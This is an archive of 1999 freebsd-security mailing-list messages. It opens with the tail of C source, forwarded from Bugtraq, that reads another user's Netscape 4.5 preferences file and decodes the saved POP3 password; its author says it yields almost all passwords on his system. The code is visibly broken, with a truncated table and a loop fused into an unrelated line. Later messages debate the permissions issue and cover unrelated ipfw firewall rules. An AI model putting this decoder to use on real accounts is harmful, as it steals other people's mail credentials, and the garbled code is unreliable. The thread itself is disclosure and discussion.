{0x70,0xef,0xc9,0x6c,0xbd,0x98,0x7c,0x64},
{0x71,0xee,0xc8,0x6d,0xbc,0x99,0x7d,0x65},
{0x7e,0xe1,0xc7,0x62,0xb3,0x96,0x72,0x6a},
{0x7f,0xe0,0xc6,0x63,0xb2,0x97,0x73,0x6b},
{0x7c,0xe3,0xc5,0x60,0xb1,0x94,0x70,0x68},
{0x7d,0xe2,0xc4,0x61,0xb0,0x95,0x71,0x69},
{0x7a,0xe5,0xc3,0x66,0xb7,0x92,0x76,0x6e},
{0x7b,0xe4,0xc2,0x67,0xb6,0x93,0x77,0x6f},
{0x78,0xe7,0xc1,0x64,0xb5,0x90,0x74,0x6c},
{0x79,0xe6,0xc0,0x65,0xb4,0x91,0x75,0x6d},
{0x66,0xf9,0xdf,0x7a,0xab,0x8e,0x6a,0x72},
{0x67,0xf8,0xde,0x7b,0xaa,0x8f,0x6b,0x73},
{0x64,0xfb,0xdd,0x78,0xa9,0x8c,0x68,0x70},
{0x65,0xfa,0xdc,0x79,0xa8,0x8d,0x69,0x71},
{0x62,0xfd,0xdb,0x7e,0xaf,0x8a,0x6e,0x76},
{0x63,0xfc,0xda,0x7f,0xae,0x8b,0x6f,0x77},
{0x60,0xff,0xd9,0x7c,0xad,0x88,0x6c,0x74},
{0x61,0xfe,0xd8,0x7d,0xac,0x89,0x6d,0x75},
{0x6e,0xf1,0xd7,0x72,0xa3,0x86,0x62,0x7a},
{0x6f,0xf0,0xd6,0x73,0xa2,0x87,0x63,0x7b},
{0x6c,0xf3,0xd5,0x70,0xa1,0x84,0x60,0x78},
{0x6d,0xf2,0xd4,0x71,0xa0,0x85,0x61,0x79},
{0x6a,0xf5,0xd3,0x76,0xa7,0x82,0x66,0x7e},
{0x6b,0xf4,0xd2,0x77,0xa6,0x83,0x67,0x7f},
{0x68,0xf7,0xd1,0x74,0xa5,0x80,0x64,0x7c},
{0x69,0xf6,0xd0,0x75,0xa4,0x81,0x65,0x7d},
{0x16,0x89,0xaf,0x0a,0xdb,0xfe,0x1a,0x02},
{0x17,0x88,0xae,0x0b,0xda,0xff,0x1b,0x03},
{0x14,0x8b,0xad,0x08,0xd9,0xfc,0x18,0x00},
{0x15,0x8a,0xac,0x09,0xd8,0xfd,0x19,0x01},
{0x12,0x8d,0xab,0x0e,0xdf,0xfa,0x1e,0x06},
{0x13,0x8c,0xaa,0x0f,0xde,0xfb,0x1f,0x07},
{0x10,0x8f,0xa9,0x0c,0xdd,0xf8,0x1c,0x04},
{0x11,0x8e,0xa8,0x0d,0xdc,0xf9,0x1d,0x05},
{0x1e,0x81,0xa7,0x02,0xd3,0xf6,0x12,0x0a},
{0x1f,0x80,0xa6,0x03,0xd2,0xf7,0x13,0x0b},
{0x1c,0x83,0xa5,0x00,0xd1,0xf4,0x10,0x08},
{0x1d,0x82,0xa4,0x01,0xd0,0xf5,0x11,0x09},
{0x1a,0x85,0xa3,0x06,0xd7,0xf2,0x16,0x0e},
{0x1b,0x84,0xa2,0x07,0xd6,0xf3,0x17,0x0f},
{0x18,0x87,0xa1,0x04,0xd5,0xf0,0x14,0x0c},
{0x19,0x86,0xa0,0x05,0xd4,0xf1,0x15,0x0d},
{0x06,0x99,0xbf,0x1a,0xcb,0xee,0x0a,0x12},
{0x07,0x98,0xbe,0x1b,0xca,0xef,0x0b,0x13},
{0x04,0x9b,0xbd,0x18,0xc9,0xec,0x08,0x10},
{0x05,0x9a,0xbc,0x19,0xc8,0xed,0x09,0x11},
{0x02,0x9d,0xbb,0x1e,0xcf,0xea,0x0e,0x16},
{0x03,0x9c,0xba,0x1f,0xce,0xeb,0x0f,0x17},
{0x00,0x9f,0xb9,0x1c,0xcd,0xe8,0x0c,0x14},
{0x01,0x9e,0xb8,0x1d,0xcc,0xe9,0x0d,0x15},
{0x0e,0x91,0xb7,0x12,0xc3,0xe6,0x02,0x1a},
{0x0f,0x90,0xb6,0x13,0xc2,0xe7,0x03,0x1b},
{0x0c,0x93,0xb5,0x10,0xc1,0xe4,0x00,0x18},
{0x0d,0x92,0xb4,0x11,0xc0,0xe5,0x01,0x19},
{0x0a,0x95,0xb3,0x16,0xc7,0xe2,0x06,0x1e},
{0x0b,0x94,0xb2,0x17,0xc6,0xe3,0x07,0x1f},
{0x08,0x97,0xb1,0x14,0xc5,0xe0,0x04,0x1c},
{0x09,0x96,0xb0,0x15,0xc4,0xe1,0x05,0x1d},
{0x36,0xa9,0x8f,0x2a,0xfb,0xde,0x3a,0x22},
{0x37,0xa8,0x8e,0x2b,0xfa,0xdf,0x3b,0x23},
{0x34,0xab,0x8d,0x28,0xf9,0xdc,0x38,0x20},
{0x35,0xaa,0x8c,0x29,0xf8,0xdd,0x39,0x21},
{0x32,0xad,0x8b,0x2e,0xff,0xda,0x3e,0x26},
{0x33,0xac,0x8a,0x2f,0xfe,0xdb,0x3f,0x27},
{0x30,0xaf,0x89,0x2c,0xfd,0xd8,0x3c,0x24},
{0x31,0xae,0x88,0x2d,0xfc,0xd9,0x3d,0x25},
{0x3e,0xa1,0x87,0x22,0xf3,0xd6,0x32,0x2a},
{0x3f,0xa0,0x86,0x23,0xf2,0xd7,0x33,0x2b},
{0x3c,0xa3,0x85,0x20,0xf1,0xd4,0x30,0x28},
{0x3d,0xa2,0x84,0x21,0xf0,0xd5,0x31,0x29},
{0x3a,0xa5,0x83,0x26,0xf7,0xd2,0x36,0x2e},
{0x3b,0xa4,0x82,0x27,0xf6,0xd3,0x37,0x2f},
{0x38,0xa7,0x81,0x24,0xf5,0xd0,0x34,0x2c},
{0x39,0xa6,0x80,0x25,0xf4,0xd1,0x35,0x2d},
{0x26,0xb9,0x9f,0x3a,0xeb,0xce,0x2a,0x32},
{0x27,0xb8,0x9e,0x3b,0xea,0xcf,0x2b,0x33},
{0x24,0xbb,0x9d,0x38,0xe9,0xcc,0x28,0x30},
{0x25,0xba,0x9c,0x39,0xe8,0xcd,0x29,0x31},
{0x22,0xbd,0x9b,0x3e,0xef,0xca,0x2e,0x36},
{0x23,0xbc,0x9a,0x3f,0xee,0xcb,0x2f,0x37},
{0x20,0xbf,0x99,0x3c,0xed,0xc8,0x2c,0x34},
{0x21,0xbe,0x98,0x3d,0xec,0xc9,0x2d,0x35},
{0x2e,0xb1,0x97,0x32,0xe3,0xc6,0x22,0x3a},
{0x2f,0xb0,0x96,0x33,0xe2,0xc7,0x23,0x3b},
{0x2c,0xb3,0x95,0x30,0xe1,0xc4,0x20,0x38},
{0x2d,0xb2,0x94,0x31,0xe0,0xc5,0x21,0x39},
{0x2a,0xb5,0x93,0x36,0xe7,0xc2,0x26,0x3e},
{0x2b,0xb4,0x92,0x37,0xe6,0xc3,0x27,0x3f},
{0x28,0xb7,0x91,0x34,0xe5,0xc0,0x24,0x3c}
};

unsigned long int getn1(unsigned char c1){
    register int i;
    if(c1=='='){return 0;}
    for(i=0;i<64;i++){if(Tbl_1[i]==c1){return i;}}
    return -1;
}

int ub64(unsigned char *in,unsigned char *out){
    int i=0;
    int j=0;
    unsigned long int n;
    if(!in||!out){return 0;}
    while(in[i]){
        n=(((getn1(in[i+0])&63)<<18)|((getn1(in[i+1])&63)<<12)|((getn1(in[i+2])&63)<<6)|(getn1(in[i+3])&63));
        out[j+0]=(unsigned char)((n>>16)&255);
        out[j+1]=(unsigned char)((n>>8)&255);
        out[j+2]=(unsigned char)(n&255);
        i+=4;j+=3;
    }
    out[j]='\0';
    return 0;
}

int decodestring(unsigned char *in,unsigned char *out){
    int i;
    int j;
    int l;
    l=strlen(in);if(l>8){l=8;}
    if(!in||!out){return 0;}
    for(i=0;ipw_dir);
        strcat(filename,"/.netscape/liprefs.js");
    }
    else if(strcmp(argv[1],"-f")==0){
        strcpy(filename,argv[2]);
    }
    else{
        printf("Unknown option %s\n",argv[1]);
        printf("%s",usage);
        exit(0);
    }
    /***************/
    if((f=fopen(filename,"r"))==NULL){printf("Cannot open %s\n",filename);return 0;}
    while(!feof(f)){
        fgets(buff,1024,f);
        if(strstr(buff,"user_pref")){
            if(r=strstr(buff,"mail.pop_password")){
                while(*r!='\"'){r++;}r++;
                while(*r!='\"'){r++;}r++;
                s=passwdbuff;
                while(*r!='\"'){*s=*r;s++;r++;}
                *s='\0';
            }
        }
    }
    fclose(f);
    if(passwdbuff[0]=='\0'){printf("Password not found!\n");return 0;}
    ub64(passwdbuff,decoded1);
    decodestring(decoded1,decoded2);
    printf("%s\n",decoded2);
}
-----------------END CUT HERE---------------

Good luck,
Lesha
paaa@uic.nnov.ru
gandalf@uic.nnov.ru

From owner-freebsd-security Thu Apr 8 18:11: 2 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pollux.or.signature.nl (pollux.or.signature.nl [194.229.138.194]) by hub.freebsd.org (Postfix) with ESMTP id DD35314E82 for ; Thu, 8 Apr 1999 18:10:27 -0700 (PDT) (envelope-from bit@signature.nl)
Received: from localhost (bit@localhost) by pollux.or.signature.nl (8.9.1/8.9.1) with SMTP id DAA12249; Fri, 9 Apr 1999 03:07:16 +0200 (MET DST)
Date: Fri, 9 Apr 1999 03:07:16 +0200 (MET DST)
From: Bart Smit
X-Sender: bit@pollux.or.signature.nl
To: Foxfair Hu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Fw: Netscape 4.5 vulnerability
In-Reply-To: <370D516D2EE.C14EFOXFAIR@news.ks.edu.tw>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 9 Apr 1999, Foxfair Hu wrote:

> session preferences .This file also contains encrypted password for
> pop3.
> Not like a DES , this encryption can be decrypted. As a result of many

Sure it can. How else can Netscape reproduce your password?

That some silly people choose to store their passwords in a file is hardly new and hardly a problem that belongs on this list.

--Bart

From owner-freebsd-security Thu Apr 8 18:35:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 3ADA214CD1 for ; Thu, 8 Apr 1999 18:35:43 -0700 (PDT) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA16835; Thu, 8 Apr 1999 18:33:06 -0700 (PDT) (envelope-from dillon)
Date: Thu, 8 Apr 1999 18:33:06 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199904090133.SAA16835@apollo.backplane.com>
To: Foxfair Hu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Fw: Netscape 4.5 vulnerability
References: <370D516D2EE.C14EFOXFAIR@news.ks.edu.tw>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:Forwarded by Foxfair Hu
:---------------- Original message follows ----------------
: From: Alexey Pavlov
: To: BUGTRAQ@netspace.org
: Date: Thu, 8 Apr 1999 21:12:27 +0400
: Subject: Netscape 4.5 vulnerability
:--
:
:I found method how to get users passwords from Netscape 4.5 for FreeBSD
: ~user/.netscape/liprefs.js file. This file is used for storing user
:last
:session preferences .This file also contains encrypted password for
:pop3.
:Not like a DES , this encryption can be decrypted. As a result of many
:experiments i wrote this program. It gives me almost all passwords in my
: system, because all people use Netscape.
:Here is src of this decryption programm:

    The 'security hole' is that netscape doesn't make the .netscape
    directory 700. I'd report it to netscape. I dunno whether they
    will do anything about it, though.

    -Matt

From owner-freebsd-security Thu Apr 8 19:26:25 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id D32A4159F6 for ; Thu, 8 Apr 1999 19:26:11 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id WAA17467; Thu, 8 Apr 1999 22:22:39 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Thu, 8 Apr 1999 22:22:39 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Matthew Dillon
Cc: Foxfair Hu , freebsd-security@FreeBSD.ORG
Subject: Re: Fw: Netscape 4.5 vulnerability
In-Reply-To: <199904090133.SAA16835@apollo.backplane.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 8 Apr 1999, Matthew Dillon wrote:

> :Forwarded by Foxfair Hu
> :---------------- Original message follows ----------------
> : From: Alexey Pavlov
> : To: BUGTRAQ@netspace.org
> : Date: Thu, 8 Apr 1999 21:12:27 +0400
> : Subject: Netscape 4.5 vulnerability
> :--
> :
> :I found method how to get users passwords from Netscape 4.5 for FreeBSD
> : ~user/.netscape/liprefs.js file. This file is used for storing user
> :last
> :session preferences .This file also contains encrypted password for
> :pop3.
> :Not like a DES , this encryption can be decrypted. As a result of many
> :experiments i wrote this program. It gives me almost all passwords in my
> : system, because all people use Netscape.
> :Here is src of this decryption programm:
>
>     The 'security hole' is that netscape doesn't make the .netscape
>     directory 700. I'd report it to netscape. I dunno whether they
>     will do anything about it, though.

Huh.
Didn't do that for me; mine is safely readable and writable only for my uid. And there are a lot of posts to bugtraq about programs that store passwords unencrypted, and it always surprises me that people are still complaining about it :-). As you suggest, the real issue is the access control used to protect the data object, which in Windows is nil, of course.

Robert N Watson
robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Thu Apr 8 20:49:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from jasper.somtel.com (jasper.somtel.com [206.139.114.254]) by hub.freebsd.org (Postfix) with ESMTP id 12D201579C for ; Thu, 8 Apr 1999 20:49:36 -0700 (PDT) (envelope-from darren@jasper.somtel.com)
Received: from localhost (darren@localhost) by jasper.somtel.com (8.9.3/8.9.3) with ESMTP id XAA18719 for ; Thu, 8 Apr 1999 23:47:25 -0400 (EDT)
Date: Thu, 8 Apr 1999 23:47:24 -0400 (EDT)
From: Darren Henderson
To: security@FreeBSD.ORG
Subject: ipfw question regarding RFC1918 addresses
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Running ipfw and natd. I use the class A RFC1918 address for the internal network.

The way things are set up, ipfw first sends everything to divert, allows all localhost stuff, then disallows the RFC1918 stuff with

add deny all from 192.168.0.0:255.255.0.0 to any via ppp0
add deny all from any to 192.168.0.0:255.255.0.0 via ppp0
add deny all from 172.16.0.0:255.240.0.0 to any via ppp0
add deny log all from any to 172.16.0.0:255.240.0.0 via ppp0
add deny all from 10.0.0.0:255.0.0.0 to any via ppp0
#add deny all from any to 10.0.0.0:255.0.0.0 via ppp0

(There are a handful of additional rules). Notice that last line is commented out. If I include that, natd appears to stop working. I'm guessing that divert is converting an incoming packet to 10.0.0.x and it's then passing through my ruleset with its new address and being disallowed.

The simple solution would seem to be to move the RFC1918 stuff above the divert rule... is that the best solution however? Have I even come close?

The goal being to block 10.0.0.0/8 coming into the machine...

______________________________________________________________________
Darren Henderson                                 darren@jasper.somtel.com

Help fight junk e-mail, visit http://www.cauce.org/

From owner-freebsd-security Fri Apr 9 0:17: 3 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bsd.vniigazmain.gazprom.ru (a17.gazprom.ru [194.215.12.17]) by hub.freebsd.org (Postfix) with ESMTP id 362B915470 for ; Fri, 9 Apr 1999 00:16:43 -0700 (PDT) (envelope-from smelekov@bsd.vniigazmain.gazprom.ru)
Received: from vniigazmain.gazprom.ru by bsd.vniigazmain.gazprom.ru with ESMTP id LAA17722; (8.9.1/vak/1.9) Fri, 9 Apr 1999 11:08:19 +0400 (MSD)
Message-ID: <370DAA59.7B3325E0@vniigazmain.gazprom.ru>
Date: Fri, 09 Apr 1999 11:20:57 +0400
From: "Serguei V. Melekhov"
Reply-To: smelekov@vniigazmain.gazprom.ru
Organization: =?iso-8859-1?Q?=C4=CF?= "=?iso-8859-1?Q?=C2=CD=C8=C8=C3=C0=C7?=" =?iso-8859-1?Q?=CE=C0=CE?= "=?iso-8859-1?Q?=C3=C0=C7=CF=D0=CE=CC?="
X-Mailer: Mozilla 4.5 [en] (Win98; I)
X-Accept-Language: ru,en
MIME-Version: 1.0
To: "freebsd-security@FreeBSD.ORG"
Subject: Ipfw related.
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello Security Users,

Maybe I missed something... Well.. Just read the text below and help if you can. ;) Thanks in advance.

Let me show you one thing:

ipfw add xxxx deny all from my.host.com to evil.host.com

- It denies packets from my.host.com to evil.host.com, but evil.host.com can still send packets to my.host.com.

Decision: add another deny rule. But here is my question! Are there any other ways to deny packets in both directions (in and out) by writing only one ipfw rule?

Reason: I have a very big ipfw rule table and just want to optimize it in some way.

--
Yours,
Serguei V. Melekhov
System Administrator of International Relations And Information Division
All-Russian Scientific Research Institute of Natural Gases and Gas Technologies
Tel.
(095) 355-9165
Fax: (095) 399-1677

From owner-freebsd-security Fri Apr 9 0:56:28 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id 6D21914D74 for ; Fri, 9 Apr 1999 00:56:11 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu)
Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA04597; Fri, 9 Apr 1999 09:54:07 +0200 (MET DST)
Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id JAA00409; Fri, 9 Apr 1999 09:53:35 +0200 (CEST) (envelope-from zgabor)
From: Zahemszky Gabor
Message-Id: <199904090753.JAA00409@CoDe.hu>
Subject: Re: FreeBSD 2.2.8 and DES (again)
In-Reply-To: <370CE733.C1C578E3@pro.via-rs.com.br> from Lauro Barbosa at "Apr 8, 99 02:28:20 pm"
To: freebsd-security@freebsd.org
Date: Fri, 9 Apr 1999 09:53:35 +0200 (CEST)
Cc: lauro@pro.via-rs.com.br
X-Mailer: ELM [version 2.4ME+ PL38 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi!

> Hello Again!
> Please, I need help.
> I have a server with FreeBSD 2.2.8 and DES instaled.
> In this server the users can to login using login_name or
> login_name.
> (whit dot at end). for example: john or john.
> Anybody know this problem ?

Sorry. I can reach only one 3.1R machine with DES, and it wasn't reproducible on it.

> How can to correct this ?

Bye,

Gabor
--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

From owner-freebsd-security Fri Apr 9 1:51: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 83B0115311 for ; Fri, 9 Apr 1999 01:50:51 -0700 (PDT) (envelope-from ark@eltex.ru)
Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id MAA27667; Fri, 9 Apr 1999 12:48:30 +0400 (MSD)
Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 9 Apr 1999 12:48:22 +0400
Received: from undisclosed-intranet-sender id xma016358; Fri, 9 Apr 99 12:48:02 +0400
Date: Fri, 9 Apr 1999 12:47:57 +0400
Message-Id: <199904090847.MAA24024@paranoid.eltex.spb.ru>
In-Reply-To: <199904082117.RAA13119@clipper.gw.tislabs.com> from "Mark S Feldman "
From: ark@eltex.ru
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: Generic Software Wrappers
To: feldman@tislabs.com
Cc: freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

Is there a commercial/less restrictive license available? (if yes) how much does it cost?

Mark S Feldman said :

>
> Almost 8 months back, I responded to a message on this list and
> described a research project we were working on. My message is below.
> At the end of the message, I said I would send another message to this
> list when we made our source available. Well, the first release of
> our Generic Software Wrappers Tool Kit -- still very much a research
> prototype -- is available. It runs under FreeBSD 2.2.x, Solaris 2.6,
> and, as much as we have ported to date, under Windows NT 4.0. We're
> limited to FreeBSD 2.2.x because we don't currently have the resources
> to port to 3.x. Check out ftp://ftp.tislabs.com/pub/wrappers if
> you're interested.

CU in Hell /Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
-----END PGP SIGNATURE-----

From owner-freebsd-security Fri Apr 9 4:18:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [212.110.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 6AA6014F9B; Fri, 9 Apr 1999 04:17:59 -0700 (PDT) (envelope-from ru@ucb.crimea.ua)
Received: (from ru@localhost) by relay.ucb.crimea.ua (8.9.2/8.9.2/UCB) id OAA32087; Fri, 9 Apr 1999 14:13:45 +0300 (EEST) (envelope-from ru)
Date: Fri, 9 Apr 1999 14:13:45 +0300
From: Ruslan Ermilov
To: "Serguei V. Melekhov"
Cc: freebsd-security@FreeBSD.ORG, luigi@FreeBSD.ORG
Subject: Re: Ipfw related.
Message-ID: <19990409141345.A31742@relay.ucb.crimea.ua>
Mail-Followup-To: "Serguei V. Melekhov" , freebsd-security@FreeBSD.ORG, luigi@freebsd.org
References: <370DAA59.7B3325E0@vniigazmain.gazprom.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: <370DAA59.7B3325E0@vniigazmain.gazprom.ru>; from Serguei V. Melekhov on Fri, Apr 09, 1999 at 11:20:57AM +0400
X-Operating-System: FreeBSD 3.1-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Apr 09, 1999 at 11:20:57AM +0400, Serguei V. Melekhov wrote:
> Hello Security Users,
>
> Maybe i missed something... Well..
> Just read text below and help if
> u can.;) Thanks in advance.
>
> Let me show you one thing:
>
> ipfw add xxxx deny all from my.host.com to evil.host.com
>
> - It denies packets from my.host.com to evil.host.com, but
> evil.host.com still can send packets to my.host.com.
>
> Decision: add another deny rule. But here is my question!
> Is there any other ways to deny packets in both sides (in and out)
> by writing only one ipfw rule?
>
No, not yet. Luigi had some plans (???) to implement a ``between'' predicate, so you'd be able to write:

ipfw add xxxx deny ip between my.host.com and evil.host.com

--
Ruslan Ermilov                          Sysadmin and DBA of the
ru@ucb.crimea.ua                        United Commercial Bank
+380.652.247.647                        Simferopol, Ukraine
http://www.FreeBSD.org                  The Power To Serve
http://www.oracle.com                   Enabling The Information Age

From owner-freebsd-security Fri Apr 9 4:26:14 1999
Delivered-To: freebsd-security@freebsd.org
Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 19DD21514D for ; Fri, 9 Apr 1999 04:26:01 -0700 (PDT) (envelope-from ks@chg.ru)
Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.1/8.9.1) with ESMTP id PAA16738; Fri, 9 Apr 1999 15:22:08 +0400 (MSD)
Message-ID:
X-Mailer: XFMail 1.2 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To:
Date: Fri, 09 Apr 1999 15:21:16 +0400 (MSD)
Organization: Landau Institute for Theoretical Physics
From: "Sergey S. Kosyakov"
To: Darren Henderson
Subject: RE: ipfw question regarding RFC1918 addresses
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Where is the place for divert rules? Check carefully what it is you want to do.

And one more thing - the better rules will be:

add deny all from 192.168.0.0/16 to any in recv ppp0
... other deny rules ...
add divert _port_ ip from any to any via _external_if_0_
add allow ip from any to any

And start natd with the "-u" flag.

Sergey.

On 09-Apr-99 Darren Henderson wrote:
>
> Running ipfw and natd. I use the class A RFC1918 address for the internal
> network.
>
> The way things are set up ipfw first sends everything to divert, allows
> all localhost stuff then disallows the RFC1918 stuff with
>
> add deny all from 192.168.0.0:255.255.0.0 to any via ppp0
> add deny all from any to 192.168.0.0:255.255.0.0 via ppp0
> add deny all from 172.16.0.0:255.240.0.0 to any via ppp0
> add deny log all from any to 172.16.0.0:255.240.0.0 via ppp0
> add deny all from 10.0.0.0:255.0.0.0 to any via ppp0
>#add deny all from any to 10.0.0.0:255.0.0.0 via ppp0
>
> (There are a handful of additional rules). Notice that last line is
> commented out. If I include that natd appears to stop working. I'm
> guessing that divert is converting an incomming packet to 10.0.0.x and its
> then passing through my ruleset with its new address and being disallowed.
> The simple solution would seem to be to move the RFC1918 stuff above the
> divert rule... is that the best solution however? Have I even come close?
>
> The goal being to block 10.0.0.0/8 comming into the machine...
>
>
> ______________________________________________________________________
> Darren Henderson                                 darren@jasper.somtel.com
>
> Help fight junk e-mail, visit http://www.cauce.org/
>

---
----------------------------------
Sergey Kosyakov
Laboratory of Distributed Computing
Department of High-Performance Computing and Applied Network Research
Landau Institute for Theoretical Physics
E-Mail: ks@chg.ru
Date: 09-Apr-99
Time: 15:14:50
----------------------------------
---

From owner-freebsd-security Fri Apr 9 5:27:27 1999
Delivered-To: freebsd-security@freebsd.org
Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24]) by hub.freebsd.org (Postfix) with ESMTP id 62A5C14FEB for ; Fri, 9 Apr 1999 05:27:24 -0700 (PDT) (envelope-from dhagan@vtopus.cs.vt.edu)
Received: (from dhagan@localhost) by vtopus.cs.vt.edu (8.9.1a/8.9.1) id IAA18415; Fri, 9 Apr 1999 08:24:41 -0400 (EDT)
Date: Fri, 9 Apr 1999 08:24:40 -0400 (EDT)
From: Daniel Hagan
To: Robert Watson
Cc: Matthew Dillon , Foxfair Hu , freebsd-security@FreeBSD.ORG
Subject: Re: Fw: Netscape 4.5 vulnerability
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 8 Apr 1999, Robert Watson wrote:

> > The 'security hole' is that netscape doesn't make the .netscape
> > directory 700. I'd report it to netscape. I dunno whether they
> > will do anything about it, though.
>
> Huh. Didn't do that for me; mine is safely readable and writable only for
> my uid.

What's your umask? If you use umask 077, then this is what I would expect, but "typical" users who don't change it from 022 would probably end up with a 755 .netscape directory.
Netscape should be smart enough to at least set the profile file to 600, if not the entire directory to 700. Daniel -- Daniel Hagan Computer Systems Engineer dhagan@cs.vt.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 9 5:42:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 669D5150E8 for ; Fri, 9 Apr 1999 05:42:48 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id IAA19937; Fri, 9 Apr 1999 08:40:04 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 9 Apr 1999 08:40:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Daniel Hagan Cc: Matthew Dillon , Foxfair Hu , freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 9 Apr 1999, Daniel Hagan wrote: > On Thu, 8 Apr 1999, Robert Watson wrote: > > > > The 'security hole' is that netscape doesn't make the .netscape > > > directory 700. I'd report it to netscape. I dunno whether they > > > will do anything about it, though. > > > > Huh. Didn't do that for me; mine is safely readable and writable only for > > my uid. > > What's your umask? If you use umask 077, then this is what I would > expect, but "typical" users who don't change it from 022 would probably > end up with a 755 .netscape directory. Netscape should be smart enough to > at least set the profile file to 600, if not the entire directory to 700. Well, it's 077 on my multi-user machines, but 022 on the notebook which I tested on. 
Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
